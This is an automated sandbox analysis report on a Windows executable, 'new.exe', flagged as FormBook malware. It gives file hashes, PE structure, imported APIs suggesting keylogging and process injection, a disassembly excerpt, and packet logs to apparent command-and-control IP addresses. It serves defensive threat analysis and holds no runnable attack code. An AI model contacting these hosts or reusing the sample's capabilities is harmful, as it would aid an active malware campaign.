                                                SSDEEP:6144:FWiMG1QRIzXL820L1UF0f4i2pCM4Q/fqRcl7ljzruMZFAn:FWtEYtCF0V2pCEyR45HuM38
                                                MD5:1AF53DD67204A7A61D5FCD2517C8C04E
                                                SHA1:C6FB1299C1B3214099BB1667CC03EAA928391DC9
                                                SHA-256:900C7399457E3EE3E77F811C0725807C74F192287BB07BD2308148B5B996DC65
                                                SHA-512:136B89C35110F309EA498092D9993D6DC5D22CCFB33847DC63C5BD7BB346AAFBE6BAB93DDFF96353C51354D283317F0AEBCBAC612BB6A0F0CFEB3BBFADEBE7D7
                                                Malicious:false
                                                Reputation:low
                                                Preview:.m.PFD9HMFI2..LS.YCEG5PT.KMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HP.D9HGY.<C.E.u.B....<88m14X/"$).+((']7q.6t+6+g\>t...a+X,5kI4BmFI2CQLS-XJ.zU7.l+*.{W/._.s&..Y..h9$.]...m+*..^+8x$^.IFI2CQLS..CE.4QT.. F7HPED9H.FK3HPGST.GEG5PTQKMA.#HPET9HI6M2CQ.STICEG7PTWKMAF7HPCD9HIFI2C!HST[CEG5PTSK..F7XPET9HIFY2CALSTYCEW5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2m%)+ YCE.aTTQ[MAFaLPET9HIFI2CQLSTYCEg5P4QKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCE

                                                C:\Users\user\AppData\Local\Temp\bothsidedness

                                                Download File
                                                Process:C:\Users\user\Desktop\new.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):288768
                                                Entropy (8bit):7.995778617826198
                                                Encrypted:true
                                                SSDEEP:6144:FWiMG1QRIzXL820L1UF0f4i2pCM4Q/fqRcl7ljzruMZFAn:FWtEYtCF0V2pCEyR45HuM38
                                                MD5:1AF53DD67204A7A61D5FCD2517C8C04E
                                                SHA1:C6FB1299C1B3214099BB1667CC03EAA928391DC9
                                                SHA-256:900C7399457E3EE3E77F811C0725807C74F192287BB07BD2308148B5B996DC65
                                                SHA-512:136B89C35110F309EA498092D9993D6DC5D22CCFB33847DC63C5BD7BB346AAFBE6BAB93DDFF96353C51354D283317F0AEBCBAC612BB6A0F0CFEB3BBFADEBE7D7
                                                Malicious:false
                                                Preview:.m.PFD9HMFI2..LS.YCEG5PT.KMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HP.D9HGY.<C.E.u.B....<88m14X/"$).+((']7q.6t+6+g\>t...a+X,5kI4BmFI2CQLS-XJ.zU7.l+*.{W/._.s&..Y..h9$.]...m+*..^+8x$^.IFI2CQLS..CE.4QT.. F7HPED9H.FK3HPGST.GEG5PTQKMA.#HPET9HI6M2CQ.STICEG7PTWKMAF7HPCD9HIFI2C!HST[CEG5PTSK..F7XPET9HIFY2CALSTYCEW5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2m%)+ YCE.aTTQ[MAFaLPET9HIFI2CQLSTYCEg5P4QKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCEG5PTQKMAF7HPED9HIFI2CQLSTYCE

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.190878324786299
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:new.exe
                                                File size:1'208'832 bytes
                                                MD5:8b86502f8b81e3335c1f4906c8acb9f7
                                                SHA1:ac9ef49458da3e4075389da3f77ff001f0736852
                                                SHA256:4e1cfeb2023e96da3293df25bc81b3c51f2852eefb0cdfa4a17dc77b65da7c8f
                                                SHA512:c9e4b1bd9bbcc5b7ce62d833c802e06667b17e1fb9d543a41b75d1427329730a2737ec6f59b13fa6f64959f49de370283c00a6bb51e1135f8a2e599ecc4b4eb7
                                                SSDEEP:24576:ku6J33O0c+JY5UZ+XC0kGso6FaXXrRsBoUFe+BPUJWY:eu0c++OCvkGs9FaXX1sBoUFe+BZY
                                                TLSH:7445CF2273DDC360CB669173BF69B7016EBF7C610630B85B2F980D7DA950162262D7A3
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                File Icon

                                                Icon Hash:aaf3e3e3938382a0

                                                Static PE Info

                                                General

                                                Entrypoint:0x427dcd
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x675B7E2D [Fri Dec 13 00:22:05 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F9CA8EA3A4Ah
                                                jmp 00007F9CA8E96814h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007F9CA8E9699Ah
                                                cmp edi, eax
                                                jc 00007F9CA8E96CFEh
                                                bt dword ptr [004C31FCh], 01h
                                                jnc 00007F9CA8E96999h
                                                rep movsb
                                                jmp 00007F9CA8E96CACh
                                                cmp ecx, 00000080h
                                                jc 00007F9CA8E96B64h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007F9CA8E969A0h
                                                bt dword ptr [004BE324h], 01h
                                                jc 00007F9CA8E96E70h
                                                bt dword ptr [004C31FCh], 00000000h
                                                jnc 00007F9CA8E96B3Dh
                                                test edi, 00000003h
                                                jne 00007F9CA8E96B4Eh
                                                test esi, 00000003h
                                                jne 00007F9CA8E96B2Dh
                                                bt edi, 02h
                                                jnc 00007F9CA8E9699Fh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007F9CA8E969A3h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007F9CA8E969F5h
                                                bt esi, 03h
                                                jnc 00007F9CA8E96A48h

                                                Rich Headers

                                                Programming Language:
                                                • [ASM] VS2013 build 21005
                                                • [ C ] VS2013 build 21005
                                                • [C++] VS2013 build 21005
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2013 UPD4 build 31101
                                                • [RES] VS2013 build 21005
                                                • [LNK] VS2013 UPD4 build 31101

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5e864.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x711c.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xc70000x5e8640x5ea001d11c1e815af3207fb1acccde6fe45c8False0.9301570756274768data7.90042965781924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x1260000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                RT_RCDATA0xcf7b80x55b29data1.000330468324896
                                                RT_GROUP_ICON0x1252e40x76dataEnglishGreat Britain0.6610169491525424
                                                RT_GROUP_ICON0x12535c0x14dataEnglishGreat Britain1.25
                                                RT_GROUP_ICON0x1253700x14dataEnglishGreat Britain1.15
                                                RT_GROUP_ICON0x1253840x14dataEnglishGreat Britain1.25
                                                RT_VERSION0x1253980xdcdataEnglishGreat Britain0.6181818181818182
                                                RT_MANIFEST0x1254740x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                Imports

                                                DLLImport
                                                WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                PSAPI.DLLGetProcessMemoryInfo
                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                UxTheme.dllIsThemeActive
                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishGreat Britain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-13T11:41:00.998018+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.1049918192.197.113.11280TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 13, 2024 11:40:38.277985096 CET4986780192.168.2.1085.159.66.93
                                                Dec 13, 2024 11:40:38.399696112 CET804986785.159.66.93192.168.2.10
                                                Dec 13, 2024 11:40:38.399795055 CET4986780192.168.2.1085.159.66.93
                                                Dec 13, 2024 11:40:38.409822941 CET4986780192.168.2.1085.159.66.93
                                                Dec 13, 2024 11:40:38.529567957 CET804986785.159.66.93192.168.2.10
                                                Dec 13, 2024 11:40:39.732321978 CET804986785.159.66.93192.168.2.10
                                                Dec 13, 2024 11:40:39.732366085 CET804986785.159.66.93192.168.2.10
                                                Dec 13, 2024 11:40:39.732495070 CET4986780192.168.2.1085.159.66.93
                                                Dec 13, 2024 11:40:39.736011028 CET4986780192.168.2.1085.159.66.93
                                                Dec 13, 2024 11:40:39.855712891 CET804986785.159.66.93192.168.2.10
                                                Dec 13, 2024 11:40:56.688352108 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:56.810705900 CET8049908192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:40:56.810858965 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:56.830984116 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:56.950728893 CET8049908192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:40:58.341840029 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:58.406092882 CET8049908192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:40:58.406109095 CET8049908192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:40:58.406162977 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:58.406244040 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:58.462389946 CET8049908192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:40:58.462630987 CET4990880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:59.360634089 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:59.480540037 CET8049918192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:40:59.480696917 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:59.495857000 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:40:59.615863085 CET8049918192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:00.998018026 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:01.057383060 CET8049918192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:01.057465076 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:01.057555914 CET8049918192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:01.057605982 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:01.117969036 CET8049918192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:01.118108034 CET4991880192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:02.017829895 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:02.138000011 CET8049925192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:02.138127089 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:02.152693987 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:02.272600889 CET8049925192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:02.272689104 CET8049925192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:03.654171944 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:03.754610062 CET8049925192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:03.754689932 CET8049925192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:03.754749060 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:03.754987955 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:03.774003029 CET8049925192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:03.774082899 CET4992580192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:04.673681974 CET4993180192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:04.793675900 CET8049931192.197.113.112192.168.2.10
                                                Dec 13, 2024 11:41:04.793795109 CET4993180192.168.2.10192.197.113.112
                                                Dec 13, 2024 11:41:04.809333086 CET4993180192.168.2.10192.197.113.112
